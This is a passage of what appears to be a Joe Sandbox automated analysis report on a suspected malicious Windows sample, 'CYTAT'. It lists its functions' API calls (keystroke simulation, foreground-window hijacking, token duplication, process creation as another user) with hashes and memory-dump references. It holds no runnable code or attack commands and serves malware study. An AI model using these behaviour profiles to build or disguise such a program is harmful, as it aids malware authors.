                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00444B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc_memmove
                                                • String ID:
                                                • API String ID: 1183979061-0
                                                • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __lock_file
                                                • String ID:
                                                • API String ID: 3031932315-0
                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                Function 03FC13E0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 03FC13F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 72ec11ea8cfb3522f989d526dd583816de7af80059b8a6b06eddffb9aca414f4
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 4CE0E67498010EDFDB00EFB8D6496DE7FB4EF04302F1041A5FD01D2281D6309D608A62

                                                Non-executed Functions

                                                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                • SendMessageW.USER32 ref: 0047CA7F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                • ImageList_SetDragCursorImage.COMCTL32(00ACED10,00000000,00000000,00000000), ref: 0047CB9B
                                                • ImageList_BeginDrag.COMCTL32(00ACED10,00000000,000000F8,000000F0), ref: 0047CBAC
                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                • SendMessageW.USER32 ref: 0047CD12
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                • SendMessageW.USER32 ref: 0047CD80
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                • SendMessageW.USER32 ref: 0047CE93
                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,009E1B90,00000000,?,?,?,?), ref: 0047CF1C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                • SendMessageW.USER32 ref: 0047CF6B
                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,009E1B90,00000000,?,?,?,?), ref: 0047CFE6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3100379633-4164748364
                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00434420
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                • IsIconic.USER32(?), ref: 0043444F
                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 2889586943-2988720461
                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                • _wcslen.LIBCMT ref: 00446498
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                • String ID: $@OH$default$winsta0
                                                • API String ID: 3324942560-3791954436
                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                • __swprintf.LIBCMT ref: 004789D3
                                                • __swprintf.LIBCMT ref: 00478A1D
                                                • __swprintf.LIBCMT ref: 00478A4B
                                                • __swprintf.LIBCMT ref: 00478A79
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                • __swprintf.LIBCMT ref: 00478AA7
                                                • __swprintf.LIBCMT ref: 00478AD5
                                                • __swprintf.LIBCMT ref: 00478B03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
